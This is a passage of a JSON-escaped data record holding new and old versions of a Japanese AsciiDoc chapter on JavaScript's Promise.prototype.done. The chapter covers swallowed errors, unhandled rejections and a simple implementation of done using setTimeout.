chain\u306e\u6700\u5f8c\u306b\u306a\u308b\u30e1\u30bd\u30c3\u30c9\u3068\u3044\u3046\u306e\u306f\u308f\u304b\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n\u307e\u305f\u3001Promise\u306b\u306f\u5f37\u529b\u306a\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u6a5f\u80fd\u304c\u3042\u308b\u3068\u7d39\u4ecb\u3057\u3066\u3044\u307e\u3057\u305f\u304c\u3001\n`done` \u306e\u4e2d\u3067\u306f\u305d\u306e\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u30ef\u30b6\u3068\u7a81\u304d\u629c\u3051\u3066\u4f8b\u5916\u3092\u51fa\u3059\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n\u4f55\u6545\u3053\u306e\u3088\u3046\u306aPromise\u306e\u6a5f\u80fd\u3068\u306f\u76f8\u53cd\u3059\u308b\u30e1\u30bd\u30c3\u30c9\u304c\u3001\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3044\u308b\u304b\u306b\u3064\u3044\u3066\u306f\n\u6b21\u306e\u3088\u3046\u306aPromise\u306e\u5931\u6557\u4f8b\u3092\u898b\u3066\u3044\u304f\u3068\u5206\u304b\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n=== \u6c88\u9ed9\u3057\u305f\u30a8\u30e9\u30fc\n\nPromise\u306b\u306f\u5f37\u529b\u306a\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u6a5f\u80fd\u304c\u3042\u308a\u307e\u3059\u304c\u3001\n(\u30c7\u30d0\u30c3\u30b0\u30c4\u30fc\u30eb\u304c\u4e0a\u624b\u304f\u50cd\u304b\u306a\u3044\u5834\u5408\u306b)\n\u3053\u306e\u6a5f\u80fd\u304c\u30d2\u30e5\u30fc\u30de\u30f3\u30a8\u30e9\u30fc\u3092\u3088\u308a\u8907\u96d1\u306a\u3082\u306e\u306b\u3057\u3066\u3057\u307e\u3046\u4e00\u9762\u304c\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u306f\u3001<<then-or-catch,then or catch?>>\u3067\u3082\u540c\u69d8\u306e\u5185\u5bb9\u304c\u51fa\u3066\u304d\u305f\u3053\u3068\u3092\u899a\u3048\u3066\u3044\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u6b21\u306e\u3088\u3046\u306a\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3059\u95a2\u6570\u3092\u8003\u3048\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n[source,js]\n[[json-promise.js]]\n.json-promise.js\n----\ninclude::embed\/embed-json-promise.js[]\n----\n\n\u6e21\u3055\u308c\u305f\u5024\u3092`JSON.parse`\u3057\u3066promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3059\u95a2\u6570\u3067\u3059\u306d\u3002\n\n\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u4f7f\u3046\u3053\u3068\u304c\u3067\u304d\u3001`JSON.parse`\u306f\u30d1\u30fc\u30b9\u306b\u5931\u6557\u3059\u308b\u3068\u4f8b\u5916\u3092\u6295\u3052\u308b\u306e\u3067\u3001\n\u305d\u308c\u3092`catch`\u3059\u308b\u3053\u3068\u304c\u51fa\u6765\u307e\u3059\u3002\n\n[source,js]\n----\nvar string = \"json\u3067\u306f\u306a\u3044\u6587\u5b57\u5217\";\nJSONPromise(string).then(function (object) {\n console.log(object);\n}).catch(function(error){\n \/\/ => JSON.parse\u3067\u4f8b\u5916\u304c\u767a\u751f\u3057\u305f\u6642\n});\n----\n\n\u3061\u3083\u3093\u3068`catch`\u3057\u3066\u3044\u308c\u3070\u4f55\u3082\u554f\u984c\u304c\u306a\u3044\u306e\u3067\u3059\u304c\u3001\u305d\u306e\u51e6\u7406\u3092\u5fd8\u308c\u3066\u3057\u307e\u3046\u3068\u3044\u3046\u30df\u30b9\u3092\n\u3057\u305f\u6642\u306b\u3069\u3053\u3067\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3057\u3066\u308b\u306e\u304b\u308f\u304b\u3089\u306a\u304f\u306a\u308b\u3068\u3044\u3046\u30d2\u30e5\u30fc\u30de\u30f3\u30a8\u30e9\u30fc\u3092\u52a9\u9577\u3055\u305b\u308b\u9762\u304c\u3042\u308a\u307e\u3059\u3002\n\n[source,js]\n.catch\u306b\u3088\u308b\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u5fd8\u308c\u3066\u3057\u307e\u3063\u305f\u5834\u5408\n----\nvar string = 
\"json\u3067\u306f\u306a\u3044\u6587\u5b57\u5217\";\nJSONPromise(string).then(function (object) {\n console.log(object);\n}); \/\/ <1>\n----\n<1> \u4f8b\u5916\u304c\u6295\u3052\u3089\u308c\u3066\u3082\u4f55\u3082\u51e6\u7406\u3055\u308c\u306a\u3044\n\n`JSON.parse`\u306e\u3088\u3046\u306a\u5206\u304b\u308a\u3084\u3059\u3044\u4f8b\u306e\u5834\u5408\u306f\u307e\u3060\u826f\u3044\u3067\u3059\u304c\u3001\n\u30e1\u30bd\u30c3\u30c9\u3092typo\u3057\u305f\u3053\u3068\u306b\u3088\u308bSyntax Error\u306a\u3069\u306f\u3088\u308a\u6df1\u523b\u306a\u554f\u984c\u3068\u306a\u308a\u3084\u3059\u3044\u3067\u3059\u3002\n\n[source,js]\n.typo\u306b\u3088\u308b\u30a8\u30e9\u30fc\n----\nvar string = \"{}\";\nJSONPromise(string).then(function (object) {\n conosle.log(object);\/\/ <1>\n});\n----\n<1> conosle \u3068\u3044\u3046typo\u304c\u3042\u308b\n\n\u3053\u306e\u5834\u5408\u306f\u3001`console`\u3092`conosle`\u3068typo\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3059\u308b\u306f\u305a\u3067\u3059\u3002\n\n> ReferenceError: conosle is not defined\n\n\u3057\u304b\u3057\u3001Promise\u3067\u306ftry-catch\u3055\u308c\u308b\u305f\u3081\u3001\u30a8\u30e9\u30fc\u304c\u63e1\u308a\u3064\u3076\u3055\u308c\u3066\u3057\u307e\u3046\u3068\u3044\u3046\u73fe\u8c61\u304c\u767a\u751f\u3057\u3084\u3059\u304f\u306a\u308a\u307e\u3059\u3002\n\u6bce\u56de\u3001\u6b63\u3057\u304f`catch`\u306e\u51e6\u7406\u3092\u66f8\u304f\u3053\u3068\u304c\u51fa\u6765\u308b\u5834\u5408\u306f\u4f55\u3082\u554f\u984c\u3042\u308a\u307e\u305b\u3093\u304c\u3001\nPromise\u306e\u5b9f\u88c5\u306b\u3088\u3063\u3066\u306f\u3053\u306e\u3088\u3046\u306a\u30df\u30b9\u304c\u691c\u77e5\u3057\u306b\u304f\u304f\u306a\u308b\u30b1\u30fc\u30b9\u304c\u3042\u308b\u3053\u3068\u3092\u77e5\u3063\u3066\u304a\u304f\u3079\u304d\u3067\u3057\u3087\u3046\u3002\n\n\u3053\u306e\u3088\u3046\u306a\u30a8\u30e9\u30fc\u306e\u63e1\u308a\u3064\u3076\u3057\u306f__unhandled rejection__\u3068\u8a00\u308f\u308c\u308b\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002\nRejected\u3055\u308c\u305f\u6642\u306e\u51e6\u7406\u304c\u306a\u3044\u3068\u3044\u3046\u305d\u306e\u307e\u307e\u306e\u610f\u5473\u3067\u3059\u306d\u3002\n\n[NOTE]\n====\n\u3053\u306eunhandled rejection\u304c\u691c\u77e5\u3057\u306b\u304f\u3044\u554f\u984c\u306fPromise\u306e\u5b9f\u88c5\u306b\u4f9d\u5b58\u3057\u307e\u3059\u3002\n\u4f8b\u3048\u3070\u3001 https:\/\/github.com\/yahoo\/ypromise[ypromise] \u306funhandled rejection\u304c\u3042\u308b\u5834\u5408\u306f\u3001\u305d\u306e\u4e8b\u3092\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u8868\u793a\u3057\u307e\u3059\u3002\n\n> Promise rejected but no error handlers were registered to it\n\n\u307e\u305f\u3001 https:\/\/github.com\/petkaantonov\/bluebird[Bluebird] \u306e\u5834\u5408\u3082\u3001\n\u660e\u3089\u304b\u306b\u4eba\u9593\u306e\u30df\u30b9\u306b\u307f\u3048\u308bReferenceError\u306e\u5834\u5408\u306a\u3069\u306f\u305d\u306e\u307e\u307e\u30b3\u30f3\u30bd\u30fc\u30eb\u306b\u30a8\u30e9\u30fc\u3092\u8868\u793a\u3057\u3066\u304f\u308c\u307e\u3059\u3002\n\n> \"Possibly unhandled ReferenceError. 
conosle is not defined\n\n\u30cd\u30a4\u30c6\u30a3\u30d6\u306ePromise\u306e\u5834\u5408\u3082\u540c\u69d8\u306b\u3053\u306e\u554f\u984c\u3078\u306e\u5bfe\u51e6\u3068\u3057\u3066GC-based unhandled rejection tracking\u3068\u3044\u3046\u3082\u306e\u304c\n\u642d\u8f09\u3055\u308c\u3064\u3064\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u30ac\u30fc\u30d9\u30c3\u30b8\u30b3\u30ec\u30af\u30b7\u30e7\u30f3\u306b\u3088\u3063\u3066\u56de\u53ce\u3055\u308c\u308b\u3068\u304d\u306b\u3001\n\u305d\u308c\u304cunhandled rejection\u3067\u3042\u308b\u306a\u3089\u3001\u30a8\u30e9\u30fc\u8868\u793a\u3092\u3059\u308b\u3068\u3044\u3046\u4ed5\u7d44\u307f\u304c\u30d9\u30fc\u30b9\u3068\u306a\u3063\u3066\u3044\u308b\u3088\u3046\u3067\u3059\u3002\n\nhttps:\/\/twitter.com\/domenic\/status\/461154989856264192[Firefox] \u3084 https:\/\/code.google.com\/p\/v8\/issues\/detail?id=3093[Chrome] \u306e\u30cd\u30a4\u30c6\u30a3\u30d6Promise\u3067\u306f\u4e00\u90e8\u5b9f\u88c5\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n====\n\n=== done\u306e\u5b9f\u88c5\n\nPromise\u306b\u304a\u3051\u308b `done` \u306f\u5148\u7a0b\u306e\u30a8\u30e9\u30fc\u306e\u63e1\u308a\u3064\u3076\u3057\u3092\u907f\u3051\u308b\u306b\u306f\u3069\u3046\u3059\u308b\u304b\u3068\u3044\u3046\u65b9\u6cd5\u8ad6\u3068\u3057\u3066\u3001\n\u305d\u3082\u305d\u3082\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u3057\u306a\u3051\u308c\u3070\u3044\u3044 \u3068\u3044\u3046\u8c6a\u5feb\u306a\u89e3\u6c7a\u65b9\u6cd5\u3092\u63d0\u4f9b\u3059\u308b\u30e1\u30bd\u30c3\u30c9\u3067\u3059\u3002\n\n`done`\u306fPromise\u306e\u4e0a\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u304c\u51fa\u6765\u308b\u306e\u3067\u3001\n`Promise.prototype.done`\u3068\u3044\u3046Promise\u306eprototype\u62e1\u5f35\u3068\u3057\u3066\u5b9f\u88c5\u3057\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n[source,js]\n[[promise-prototype-done.js]]\n.promise-prototype-done.js\n----\ninclude::lib\/promise-prototype-done.js[]\n----\n\nsetTimeout\u306e\u4e2d\u3067throw\u3092\u3059\u308b\u3053\u3068\u3067\u3001\u5916\u3078\u305d\u306e\u307e\u307e\u4f8b\u5916\u3092\u6295\u3052\u308b\u3053\u3068\u3092\u5229\u7528\u3057\u3066\u3044\u307e\u3059\u3002\n\n[source,js]\n.setTimeout\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u5185\u3067\u306e\u4f8b\u5916\n----\ntry{\n setTimeout(function callback() {\n throw new Error(\"error\");\/\/ <1>\n }, 0);\n}catch(error){\n console.error(error);\n}\n----\n<1> \u3053\u306e\u4f8b\u5916\u306f\u30ad\u30e3\u30c3\u30c1\u3059\u308b\u3053\u3068\u51fa\u6765\u306a\u3044\n\n[NOTE]\n====\n\u306a\u305c\u975e\u540c\u671f\u306e`callback`\u5185\u3067\u306e\u4f8b\u5916\u3092\u30ad\u30e3\u30c3\u30c1\u51fa\u6765\u306a\u3044\u306e\u304b\u306f\u4ee5\u4e0b\u304c\u53c2\u8003\u306a\u308a\u307e\u3059\u3002\n\n- http:\/\/techblog.yahoo.co.jp\/programming\/javascript_error\/[JavaScript\u3068\u975e\u540c\u671f\u306e\u30a8\u30e9\u30fc\u51e6\u7406 - Yahoo! 
JAPAN Tech Blog]\n====\n\n<<promise-prototype-done.js,`Promise.prototype.done`>> \u3092\u3088\u304f\u898b\u3066\u307f\u308b\u3068\u3001\u4f55\u3082`return`\u3057\u3066\u3044\u306a\u3044\u3053\u3068\u3082\u308f\u304b\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\u3064\u307e\u308a\u3001`done`\u306f\u300c\u3053\u3053\u3067Promise chain\u306f\u7d42\u4e86\u3057\u3066\u3001\u4f8b\u5916\u304c\u8d77\u304d\u305f\u5834\u5408\u306f\u305d\u306e\u307e\u307epromise\u306e\u5916\u3078\u6295\u3052\u76f4\u3059\u300d\u3068\u3044\u3046\u51e6\u7406\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n\u5b9f\u88c5\u3084\u74b0\u5883\u304c\u3057\u3063\u304b\u308a\u5bfe\u5fdc\u3057\u3066\u3044\u308c\u3070\u3001__unhandled rejection__\u306e\u691c\u77e5\u306f\u3067\u304d\u308b\u305f\u3081\u3001\u5fc5\u305a\u3057\u3082`done`\u304c\u5fc5\u8981\u3068\u3044\u3046\u308f\u3051\u3067\u306f\u306a\u304f\u3001\n\u307e\u305f\u4eca\u56de\u306e<<promise-prototype-done.js,`Promise.prototype.done`>>\u306e\u3088\u3046\u306b\u3001`done`\u306f\u65e2\u5b58\u306ePromise\u306e\u4e0a\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u305f\u3081\u3001\n<<es6-promises,ES6 Promises>>\u306e\u4ed5\u69d8\u305d\u306e\u3082\u306e\u306b\u306f\u5165\u3089\u306a\u304b\u3063\u305f\u3068\u8a00\u3048\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n[NOTE]\n\u4eca\u56de\u306e`Promise.prototype.done`\u306e\u5b9f\u88c5\u306f https:\/\/www.promisejs.org\/[promisejs.org] \u3092\u53c2\u8003\u306b\u3057\u3066\u3044\u307e\u3059\u3002\n\n=== \u307e\u3068\u3081\n\n\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001 https:\/\/github.com\/kriskowal\/q\/wiki\/API-Reference#promisedoneonfulfilled-onrejected-onprogress[Q] \u3084 https:\/\/github.com\/petkaantonov\/bluebird[Bluebird] \u3084 https:\/\/github.com\/cscott\/prfun#promisedone--undefined[prfun] \u7b49\n\u591a\u304f\u306ePromise\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b`done`\u306e\u57fa\u790e\u7684\u306a\u5b9f\u88c5\u3068\u3001`then`\u3068\u306f\u3069\u306e\u3088\u3046\u306a\u9055\u3044\u304c\u3042\u308b\u304b\u306b\u3064\u3044\u3066\u5b66\u3073\u307e\u3057\u305f\u3002\n\n`done`\u306b\u306f2\u3064\u306e\u5074\u9762\u304c\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\n\n* `done`\u306e\u4e2d\u3067\u8d77\u304d\u305f\u30a8\u30e9\u30fc\u306f\u5916\u3078\u4f8b\u5916\u3068\u3057\u3066\u6295\u3052\u76f4\u3059\n* Promise chain \u3092\u7d42\u4e86\u3059\u308b\u3068\u3044\u3046\u5ba3\u8a00\n\n<<then-or-catch,then or catch?>> \u3068\u540c\u69d8\u306bPromise\u306b\u3088\u308a\u6c88\u9ed9\u3057\u3066\u3057\u307e\u3063\u305f\u30a8\u30e9\u30fc\u306b\u3064\u3044\u3066\u306f\u3001\n\u30c7\u30d0\u30c3\u30b0\u30c4\u30fc\u30eb\u3084\u30e9\u30a4\u30d6\u30e9\u30ea\u306e\u6539\u5584\u7b49\u3067\u6b86\u3069\u306e\u30b1\u30fc\u30b9\u3067\u306f\u554f\u984c\u3067\u306f\u306a\u304f\u306a\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u307e\u305f\u3001`done`\u306f\u5024\u3092\u8fd4\u3055\u306a\u3044\u4e8b\u3067\u305d\u308c\u4ee5\u4e0aPromise chain\u3092\u7e4b\u3052\u308b\u4e8b\u304c\u3067\u304d\u306a\u304f\u306a\u308b\u305f\u3081\u3001\n\u305d\u306e\u3088\u3046\u306a\u7d71\u4e00\u611f\u3092\u6301\u305f\u305b\u308b\u3068\u3044\u3046\u7528\u9014\u3067`done`\u3092\u4f7f\u3046\u3053\u3068\u3082\u51fa\u6765\u307e\u3059\u3002\n\n<<es6-promises,ES6 Promises>> 
\u3067\u306f\u6839\u672c\u306b\u7528\u610f\u3055\u308c\u3066\u308b\u6a5f\u80fd\u306f\u3042\u307e\u308a\u591a\u304f\u3042\u308a\u307e\u305b\u3093\u3002\n\u305d\u306e\u305f\u3081\u3001\u81ea\u3089\u62e1\u5f35\u3057\u305f\u308a\u3001\u62e1\u5f35\u3057\u305f\u30e9\u30a4\u30d6\u30e9\u30ea\u7b49\u3092\u5229\u7528\u3059\u308b\u30b1\u30fc\u30b9\u304c\u591a\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n\u305d\u306e\u6642\u3067\u3082\u4f55\u3067\u3082\u3084\u308a\u904e\u304e\u308b\u3068\u3001\u305b\u3063\u304b\u304f\u975e\u540c\u671f\u51e6\u7406\u3092Promise\u3067\u307e\u3068\u3081\u3066\u3082\u8907\u96d1\u5316\u3057\u3066\u3057\u307e\u3046\u5834\u5408\u304c\u3042\u308b\u305f\u3081\u3001\n\u7d71\u4e00\u611f\u3092\u6301\u305f\u305b\u308b\u3068\u3044\u3046\u306e\u306f\u62bd\u8c61\u7684\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3067\u3042\u308bPromise\u306b\u304a\u3044\u3066\u306f\u5927\u4e8b\u306a\u90e8\u5206\u3068\u8a00\u3048\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n","old_contents":"[[promise-done]]\n== Promise.prototype.done \u3068\u306f\u4f55\u304b?\n\n\u65e2\u5b58\u306ePromise\u5b9f\u88c5\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u5229\u7528\u3057\u305f\u3053\u3068\u304c\u3042\u308b\u4eba\u306f\u3001\n`then` \u306e\u4ee3\u308f\u308a\u306b\u4f7f\u3046 `done` \u3068\u3044\u3046\u30e1\u30bd\u30c3\u30c9\u3092\u898b\u305f\u3053\u3068\u304c\u3042\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u305d\u308c\u3089\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u306f `Promise.prototype.done` \u3068\u3044\u3046\u3088\u3046\u306a\u5b9f\u88c5\u304c\u5b58\u5728\u3057\u3001\n\u4f7f\u3044\u65b9\u306f`then`\u3068\u540c\u3058\u3067\u3059\u304c\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3055\u306a\u3044\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n`Promise.prototype.done` \u306f\u3001<<es6-promises,ES6 Promises>>\u3084<<promises-aplus,Promises\/A+>>\u306e\u4ed5\u69d8\u306b\u306f\n\u5b58\u5728\u3057\u3066\u3044\u306a\u3044\u8a18\u8ff0\u3067\u3059\u304c\u3001\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u304c\u5b9f\u88c5\u3057\u3066\u3044\u307e\u3059\u3002\n\n\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001`Promise.prototype.done`\u3068\u306f\u4f55\u304b?\n\u307e\u305f\u4f55\u6545\u3053\u306e\u3088\u3046\u306a\u30e1\u30bd\u30c3\u30c9\u304c\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u304b\u306b\u3064\u3044\u3066\u5b66\u3093\u3067\u3044\u304d\u307e\u3057\u3087\u3046\u3002\n\n=== 
done\u3092\u4f7f\u3063\u305f\u30b3\u30fc\u30c9\u4f8b\n\n\u5b9f\u969b\u306bdone\u3092\u4f7f\u3063\u305f\u30b3\u30fc\u30c9\u3092\u898b\u3066\u307f\u308b\u3068`done`\u306e\u6319\u52d5\u304c\u5206\u304b\u308a\u3084\u3059\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n[[promise-done-example.js]]\n.promise-done-example.js\n----\ninclude::embed\/embed-promise-done-example.js[]\n----\n\n\u6700\u521d\u306b\u8ff0\u3079\u305f\u3088\u3046\u306b\u3001`Promise.prototype.done`\u306f\u4ed5\u69d8\u3068\u3057\u3066\u306f\u5b58\u5728\u3057\u306a\u3044\u305f\u3081\u3001\n\u5229\u7528\u3059\u308b\u969b\u306f\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u3046\u304b\u81ea\u5206\u3067\u5b9f\u88c5\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002\n\n\u5b9f\u88c5\u306b\u3064\u3044\u3066\u306f\u5f8c\u3067\u89e3\u8aac\u3057\u307e\u3059\u304c\u3001\u307e\u305a\u306f`then`\u3092\u4f7f\u3063\u305f\u5834\u5408\u3068`done`\u3092\u4f7f\u3063\u305f\u3082\u306e\u3092\u6bd4\u8f03\u3057\u3066\u307f\u307e\u3059\u3002\n\n[source,js]\n.then\u3092\u4f7f\u3063\u305f\u5834\u5408\n----\nvar promise = Promise.resolve();\npromise.then(function () {\n JSON.parse(\"this is not json\");\n}).catch(function (error) {\n console.error(error);\/\/ => \"SyntaxError: JSON.parse: unexpected keyword at line 1 column 1 of the JSON data\"\n});\n----\n\n\n\u6bd4\u3079\u3066\u898b\u308b\u3068\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u9055\u3044\u304c\u3042\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002\n\n* `done` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3055\u306a\u3044\n** \u3064\u307e\u308a\u3001done\u306e\u5f8c\u306b`catch`\u7b49\u306e\u30e1\u30bd\u30c3\u30c9\u30c1\u30a7\u30fc\u30f3\u306f\u3067\u304d\u306a\u3044\n* `done` \u306e\u4e2d\u3067\u767a\u751f\u3057\u305f\u30a8\u30e9\u30fc\u306f\u305d\u306e\u307e\u307e\u5916\u306b\u4f8b\u5916\u3068\u3057\u3066\u6295\u3052\u3089\u308c\u308b\n** \u3064\u307e\u308a\u3001Promise\u306b\u3088\u308b\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u304c\u884c\u308f\u308c\u306a\u3044\n\n`done` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3057\u3066\u3044\u306a\u3044\u306e\u3067\u3001\nPromise chain\u306e\u6700\u5f8c\u306b\u306a\u308b\u30e1\u30bd\u30c3\u30c9\u3068\u3044\u3046\u306e\u306f\u308f\u304b\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n\u307e\u305f\u3001Promise\u306b\u306f\u5f37\u529b\u306a\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u6a5f\u80fd\u304c\u3042\u308b\u3068\u7d39\u4ecb\u3057\u3066\u3044\u307e\u3057\u305f\u304c\u3001\n`done` \u306e\u4e2d\u3067\u306f\u305d\u306e\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u30ef\u30b6\u3068\u7a81\u304d\u629c\u3051\u3066\u4f8b\u5916\u3092\u51fa\u3059\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n\u4f55\u6545\u3053\u306e\u3088\u3046\u306aPromise\u306e\u6a5f\u80fd\u3068\u306f\u76f8\u53cd\u3059\u308b\u30e1\u30bd\u30c3\u30c9\u304c\u3001\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3044\u308b\u304b\u306b\u3064\u3044\u3066\u306f\n\u6b21\u306e\u3088\u3046\u306aPromise\u306e\u5931\u6557\u4f8b\u3092\u898b\u3066\u3044\u304f\u3068\u5206\u304b\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n=== 
\u6c88\u9ed9\u3057\u305f\u30a8\u30e9\u30fc\n\nPromise\u306b\u306f\u5f37\u529b\u306a\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u6a5f\u80fd\u304c\u3042\u308a\u307e\u3059\u304c\u3001\n(\u30c7\u30d0\u30c3\u30b0\u30c4\u30fc\u30eb\u304c\u4e0a\u624b\u304f\u50cd\u304b\u306a\u3044\u5834\u5408\u306b)\n\u3053\u306e\u6a5f\u80fd\u304c\u30d2\u30e5\u30fc\u30de\u30f3\u30a8\u30e9\u30fc\u3092\u3088\u308a\u8907\u96d1\u306a\u3082\u306e\u306b\u3057\u3066\u3057\u307e\u3046\u4e00\u9762\u304c\u3042\u308a\u307e\u3059\u3002\n\n\u3053\u308c\u306f\u3001<<then-or-catch,then or catch?>>\u3067\u3082\u540c\u69d8\u306e\u5185\u5bb9\u304c\u51fa\u3066\u304d\u305f\u3053\u3068\u3092\u899a\u3048\u3066\u3044\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u6b21\u306e\u3088\u3046\u306a\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3059\u95a2\u6570\u3092\u8003\u3048\u3066\u307f\u307e\u3057\u3087\u3046\u3002\n\n[source,js]\n[[json-promise.js]]\n.json-promise.js\n----\ninclude::embed\/embed-json-promise.js[]\n----\n\n\u6e21\u3055\u308c\u305f\u5024\u3092`JSON.parse`\u3057\u3066promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3059\u95a2\u6570\u3067\u3059\u306d\u3002\n\n\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u4f7f\u3046\u3053\u3068\u304c\u3067\u304d\u3001`JSON.parse`\u306f\u30d1\u30fc\u30b9\u306b\u5931\u6557\u3059\u308b\u3068\u4f8b\u5916\u3092\u6295\u3052\u308b\u306e\u3067\u3001\n\u305d\u308c\u3092`catch`\u3059\u308b\u3053\u3068\u304c\u51fa\u6765\u307e\u3059\u3002\n\n[source,js]\n----\nvar string = \"json\u3067\u306f\u306a\u3044\u6587\u5b57\u5217\";\nJSONPromise(string).then(function (object) {\n console.log(object);\n}).catch(function(error){\n \/\/ => JSON.parse\u3067\u4f8b\u5916\u304c\u767a\u751f\u3057\u305f\u6642\n});\n----\n\n\u3061\u3083\u3093\u3068`catch`\u3057\u3066\u3044\u308c\u3070\u4f55\u3082\u554f\u984c\u304c\u306a\u3044\u306e\u3067\u3059\u304c\u3001\u305d\u306e\u51e6\u7406\u3092\u5fd8\u308c\u3066\u3057\u307e\u3046\u3068\u3044\u3046\u30df\u30b9\u3092\n\u3057\u305f\u6642\u306b\u3069\u3053\u3067\u30a8\u30e9\u30fc\u304c\u767a\u751f\u3057\u3066\u308b\u306e\u304b\u308f\u304b\u3089\u306a\u304f\u306a\u308b\u3068\u3044\u3046\u30d2\u30e5\u30fc\u30de\u30f3\u30a8\u30e9\u30fc\u3092\u52a9\u9577\u3055\u305b\u308b\u9762\u304c\u3042\u308a\u307e\u3059\u3002\n\n[source,js]\n.catch\u306b\u3088\u308b\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u3092\u5fd8\u308c\u3066\u3057\u307e\u3063\u305f\u5834\u5408\n----\nvar string = \"json\u3067\u306f\u306a\u3044\u6587\u5b57\u5217\";\nJSONPromise(string).then(function (object) {\n console.log(object);\n}); \/\/ <1>\n----\n<1> \u4f8b\u5916\u304c\u6295\u3052\u3089\u308c\u3066\u3082\u4f55\u3082\u51e6\u7406\u3055\u308c\u306a\u3044\n\n`JSON.parse`\u306e\u3088\u3046\u306a\u5206\u304b\u308a\u3084\u3059\u3044\u4f8b\u306e\u5834\u5408\u306f\u307e\u3060\u826f\u3044\u3067\u3059\u304c\u3001\n\u30e1\u30bd\u30c3\u30c9\u3092typo\u3057\u305f\u3053\u3068\u306b\u3088\u308bSyntax Error\u306a\u3069\u306f\u3088\u308a\u6df1\u523b\u306a\u554f\u984c\u3068\u306a\u308a\u3084\u3059\u3044\u3067\u3059\u3002\n\n[source,js]\n.typo\u306b\u3088\u308b\u30a8\u30e9\u30fc\n----\nvar string = \"{}\";\nJSONPromise(string).then(function (object) {\n conosle.log(object);\/\/ <1>\n});\n----\n<1> conosle 